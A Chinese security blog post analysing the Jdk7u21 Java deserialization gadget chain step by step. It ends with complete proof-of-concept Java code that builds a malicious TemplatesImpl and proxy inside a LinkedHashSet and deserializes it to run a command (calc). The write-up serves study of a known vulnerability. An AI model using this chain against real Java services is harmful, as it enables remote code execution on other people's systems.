『Java安全』反序列化-Jdk7u21 POP链分析_ysoserial Jdk7u21 payload 分析_TemplateImpl触发反序列化漏洞

已于 2022-03-10 20:44:05 修改
阅读量1.2k 收藏
点赞数
分类专栏: # 反序列化 文章标签: java jndi注入 web安全 7u21 反序列化
于 2022-03-02 18:50:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/123227676
版权

文章目录

前言

环境为Jdk<=7u21 +自带Xalan

源代码及原作者文章:

Jdk7u21.java
Java 7u21 Security Advisory

代码审计 | 原理分析

1、TemplatseImpl.newTransformer()触发_bytecodes的类加载

newTransformer()首先获取了TransformerImpl实例,传入参数前又执行了getTransletInstance()获取Translet实例
在这里插入图片描述
获取类实例中调用了defineTransletClasses(),这里要确保TemplatesImpl的_name非空、_class为空才能进入
在这里插入图片描述
defineTransletClasses中要确保TemplateImpl的_bytecodes非空
在这里插入图片描述
然后就开始加载_bytecodes里面的字节码,这里要确保这个类是AbstractTranslet的子类
在这里插入图片描述
跳出defineTransletClasses(),后面就进行实例化_bytecodes的类,因此,这里bytecodes我们只要生成一个AbstractTranslet的子类,然后在构造器或者是静态代码块写入RCE即可
在这里插入图片描述

设置_tfactory的作用

在我们的分析中是不需要设置_tfactory的
setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
因为在后续版本7u80修改了判断条件需要设置这一段,在21版本不需要

2、TemplatseImpl.getOutputProperties()触发newTransformer()

TemplatesImpl.getOutputProperties()调用了newTransformer().getOutputProperties()
在这里插入图片描述

下面分析怎么调用TemplateImpl.getOutputProperties()

3、动态代理调用getOutputProperties()

又要用到cc1的AnnotationInvocationHandler了,它有一个equalsImpl()方法
在这里插入图片描述
这里向恶意TemplatesImpl对象循环调用type类里的所有方法,恰好,TemplatesImpl的父类Template刚好有getOutputProperties()方法,因此这里我们实例化AnnotationInvocationHandler的时候要把type设置成Template类

这样就会保证调用getOutputProperties()了
在这里插入图片描述
然后找equalsImpl()在哪被调用,刚好在invoke调用了
在这里插入图片描述
根据逻辑:我们要调用代理的equals方法,传参是恶意TemplatesImpl对象,按照下图的方式就能够触发了
在这里插入图片描述
接着分析怎么把它和反序列化联系起来

4、LinkedHashSet反序列化触发AnnotationInvocationHandler.equals()

LinkedHashSet的父类HashSet重写了readObject(),这里将LinkedHashSet里面的各项传入了map.put
在这里插入图片描述
看一下put,这段代码是判断新插入的元素是否已经存在,这里就调用了equals方法
在这里插入图片描述
那么我们要保证key是proxy、k是恶意TemplatesImpl,看一下k的来源:k是上一个元素
在这里插入图片描述
那么我们要先给LinkedHashSet加入恶意TemplatesImpl、然后再加入代理proxy,就能够完成触发
在这里插入图片描述
if条件还有个hash判断是必须绕过的:
在这里插入图片描述
也就是恶意TemplatesImpl的hash要和proxy的哈希相等

绕过hash

第一次传入恶意TemplatesImpl调用的是自己的hashCode,而第二次传入proxy调用的是AnnotationInvocationHandler重写的hashCode
在这里插入图片描述
这个memberValues是定义Handler传入的map
在这里插入图片描述
看一下计算公式:127× 键哈希 ^ 值哈希 == var1== hash(TemplatesImpl)

int var1 = 0;
var1 += 127 * ((String)var3.getKey()).hashCode() ^ memberValueHashCode(var3.getValue())

那么我们要在定义Handler传入的map令键的哈希是0,而值是恶意TemplatesImpl即可构造出
hash(TemplatesImpl) == hash(TemplatesImpl)从而绕过判断

也就是这串字符的来源:f5a5a608
在这里插入图片描述
在这里插入图片描述

复现代码

GenerateEvilByJavaassist.java:使用javaassist生成AbstractTranslet的子类

package jdk7u21;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;

public class GenerateEvilByJavaassist {
    static byte[] generate() throws Exception{
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.makeClass("Evil");
        CtClass zuper = pool.get(AbstractTranslet.class.getName());
        clazz.setSuperclass(zuper);

        CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);
        constructor.setBody("{Runtime.getRuntime().exec(\"calc\");}");
        clazz.addConstructor(constructor);

        return clazz.toBytecode();
    }


}

GetTemplatesImpl.java:生成恶意TemplatesImpl类

package jdk7u21;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

import java.lang.reflect.Field;

public class GetTemplatesImpl {
    static TemplatesImpl getTemplatesImpl() throws Exception{
        byte[][] bytes = new byte[][]{GenerateEvilByJavaassist.generate()};

        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        setValue(templates, "_bytecodes", bytes);
        setValue(templates, "_name", "foo");

        return  templates;
    }

    private static void setValue(Object obj, String name, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }
}

GetProxy.java:生成代理

package jdk7u21;


import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javax.xml.transform.Templates;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;

public class GetProxy {
    static Map map = new HashMap();
    static Templates getProxy() throws Exception{
        Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor constructor = cls.getDeclaredConstructors()[0];
        constructor.setAccessible(true);

        InvocationHandler handler = (InvocationHandler)constructor.newInstance(Templates.class, map);
        Templates proxy = (Templates) Proxy.newProxyInstance(Object.class.getClassLoader(), TemplatesImpl.class.getInterfaces(), handler);

        return proxy;
    }
    static void put(Object a, Object b){
        map.put(a,b);
    }
}

Manual.java:触发反序列化

package jdk7u21;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import java.io.*;
import java.util.LinkedHashSet;

public class Manual {
    public static void main(String[] args) throws Exception {
        TemplatesImpl templates = GetTemplatesImpl.getTemplatesImpl();

        LinkedHashSet set = new LinkedHashSet();
        set.add(templates);
        set.add(GetProxy.getProxy());

        GetProxy.put("f5a5a608", templates);

        File f = File.createTempFile("temp", "out");

        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(f));
        oos.writeObject(set);
        oos.close();

        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(f));
        Object o = ois.readObject();
        System.out.println(o);
        ois.close();

        f.deleteOnExit();
    }
}

在这里插入图片描述

POP链

在这里插入图片描述

欢迎关注我的CSDN :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/123227676
版权声明:本文为原创,转载时须注明出处及本声明

Ho1aAs
关注
专栏目录
jdk1.7.0_79下载jdk-7u79-windows-x64
04-02
1. 下载`jdk-7u79-windows-x64.exe`安装文件。 2. 运行安装程序,按照提示进行安装。 3. 配置系统环境变量,包括`JAVA_HOME`指向JDK安装目录,`PATH`包含`%JAVA_HOME%\bin`,确保命令行可以执行Java相关命令。 **5....
JDK7u21反序列链学习
「 虚幻私塾」
04-12 597
Python微信订餐小程序课程视频 https://blog.csdn.net/m0_56069948/article/details/122285951 Python实战量化交易理财系统 https://blog.csdn.net/m0_56069948/article/details/122285941 JDK7u21 1、前置知识 jdk7u21是一条不依赖CommonsCollections库依赖的,看利用链所有知识其实跟CommonsCollections也有重复,我们来学习一下以前没学过的类或者
WebJava原生反序列化jdk7u21——又见动态代理
最新发布
uuzeray的博客
03-05 1250
WebJava反序列化之CC7链——Hashtable-CSDN博客【WebJava反序列化之再看CC1--LazyMap-CSDN博客有相关的前置知识,跟起来还挺有意思。
java安全】原生反序列化利用链JDK7u21
leekos的博客,分享web安全相关知识~
08-03 3404
进行反序列化利用。我们肯定会想,如果不利用第三方类库,能否进行反序列化利用链呢?这里还真有:JDK7u21。但是只适用于java 7u及以前的版本在使用这条利用链时,需要设置jdkjdk7u21
java序列化_Java反序列化系列 ysoserial Jdk7u21
weixin_40003451的博客
11-17 322
0x01Jdk7U21漏洞简介谈到java反序列化,就绕不开一个经典的漏洞,在ysoserial 的payloads目录下 有一个jdk7u21,以往的反序列化Gadget都是需要借助第三方库才可以成功执行,但是jdk7u21的Gadget执行过程中所用到的所有类都存在在JDK中,JRE版本<=7u21都会存在此漏洞0x02 Jdk7u21漏洞原理深入讲解漏洞执行流程整体的恶意...
[Java反序列化]JDK7u21反序列化链学习
feng的博客
08-30 801
前言 开始学习JDK7u21的原生链,和CC链的逻辑比起来难了不少呜呜。 版本 JDK7u21及其之前都可以。当然这个之前是广义的,因为比如JDK7在更新,不代表JDK6就没有在更新。所以相对来说的可以认为是,JDK7u21这个版本以及之前时间发布的所有Java版本都有问题,之后的JDK6可能在某一段时间仍有问题,具体也不考究了。 <properties> <maven.compiler.source>7</maven.compiler.source&
java-jdk1.8-8u361-all-jdk-win-linux
01-31
java-jdk1.8-8u361-all-jdk-win-linux 该压缩包中包含jdk1.8-8u361下windows版本和linux版本,其包含快速安装包和对应的jdk压缩包版本,具体内容如下: jdk-8u361-linux-aarch64.rpm jdk-8u361-linux-i586.rpm jdk-8...
OpenJDK8U-jdk_aarch64_linux_hotspot_8u252b09.tar.gz
12-16
OpenJDK8U-jdk_aarch64_linux_hotspot_8u252b09.tar.gz 是一个针对aarch64(也称为ARM64或AArch64)架构的Linux系统的OpenJDK(Open Java Development Kit)版本。这个压缩包包含的是OpenJDK 8 Update 252(8u252b09...
OpenJDK8U-jdk_x64_linux_hotspot_8u265b01.tar.gz
09-07
它包含JRE(Java运行环境)和JDKJava开发工具包),JDK除了JRE之外,还包含了用于编译、调试和分析Java程序的工具,如javac(Java编译器)、javadoc(文档生成器)和jdb(Java调试器)。 此压缩包中的"jdk8u265-...
jdk1.7 64位官方版 jdk-7u79-linux-x64.tar.gz
10-14
1. 首先,下载名为“jdk-7u79-linux-x64.tar.gz”的压缩文件,这是针对Linux 64位系统的JDK 1.7的归档文件。 2. 使用解压命令(如tar -zxvf jdk-7u79-linux-x64.tar.gz)将内容解压到指定目录。 3. 设置环境变量,...
jdk-7u21-window-i586.exe
01-13
已经绝版的jdk7.0版本,如果你想要你就下载看看哈,个人感觉挺好的!
java7u21最新版本
05-31
Java语言恐怕是稳居网路应用程序语言的首选了,这都要归功于它高度的安全性以及跨平台的特性,几乎在目前所有的电脑平台上您都可以见得到Java的芳踪。过去很可能会有不少人抱怨Java虽然有著相当不错的跨平台以及安全防护等特性,但是它的执行速度远远不及C++等各种传统惯用的程序语言。不过这次Sun Microsystem可是有备而来的,不仅在执行速度上有大幅度的改革,而且在内容上也有做了一些修改以及增强。最新JAVA运行库,建立一个运行JAVA的环境。这一升级版对Java Plug-in进行了功能增强,提供了对Netscape 6 Open JVM整合支持等等。由于JRE新增的功能以及程序修正之处相当多,如果需要详尽资料的话不妨可以参考Sun的官方网页。 java se runtime environment包含java虚拟机,运行时类库,是用来运行java语言的必备和推荐环境,不包含开发和编译工具,如果需要这类工具请下载java se development kit
jdk-7u21-windows-x64
05-15
jdk-7u21-windows-x64 凑字 :JDK(JavaDevelopmentKit)是整个Java的核心,包括了Java运行环境、Java工具和Java基础类库。
jdk-7u21-windows-x64.exe
01-24
java最常用的jdk版本,在windows下双击运行可直接安装,安装成功后,配上环境变量就可以使用。
jdk-7u21-windows-x64.part1
05-01
有两部分 windows-x64 目前最新的JDK
Javaweb安全——反序列化漏洞-原生利用链JDK7u21
weixin_43610673的博客
07-08 580
先来看看ysoserial当中payload的调用链:从TemplatesImpl.getOutputProperties()开始是很熟悉的,而调用它用的类也在之前CC1利用链出现过:当时只用到了这个类会触发 Map#put 、 Map#get 的特点,这条利用链则是用到了其方法去调用 有个很明显的反射调用 ,而 memberMethod 由getMemberMethods()方法获得,最终是由this.type.getDeclaredMethods()得到的type属性设置的类的所有方法。 equals
java反序列之Jdk7u21回显
m0_64354070的博客
12-06 2228
以前在打RMI反序列化的时候都是用的CC、CB利用链实现报错回显,很好使。 之前在做一次项目的时候发现了目标存在RMI反序列化漏洞,系统为Windows,无DNS不出网。 通过延时探测出只存在Jdk7u21利用链。 RMI回显 打目标时依然尝试使用老方法回显,Jdk7u21 + 报错回显,发现一直没回显。平时自己Jdk7u21利用链用得比较少,大概了解Jdk7u21最后的利用也是通过Templatesimpl#newTransformer方法实现代码执行,只能去看代码分析下失败的原因。 Jdk7u
Java反序列 Jdk7u21 Payload 学习笔记
weixin_44476888的博客
04-24 1659
0x00 简介 最近在看Java 反序列化的一些东西,在学习 ysoserial 的代码时,看到 payload list 中有一个比较特殊的 Jdk7u21,该 payload 不依赖第三方库,只需 JRE 即可完成攻击,影响 JRE versions <=7u21 的版本。在学习的过程中,觉得很有意思,这里记录一下的过程,如果有什么地方写的不准确或错误,欢迎指出 文章中的代码运行环境为...
ysoserial-cc2 java反序列化
springgold的博客
09-02 235
yso-cc2 1从入口看 1) 2) 3)createTemplatesImpl方法,与jdk7u21的利用类相同 public static <T> T createTemplatesImpl ( final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory ) throws Exception { f
Java序列化与反序列化详解及其应用场景
Java序列化和反序列化Java编程中的一项重要功能,它涉及到将对象的状态转换为可存储或传输的字节序列,以及将这些字节序列恢复回原始对象的过程。序列化和反序列化在多个场景中发挥关键作用,例如数据持久化和网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值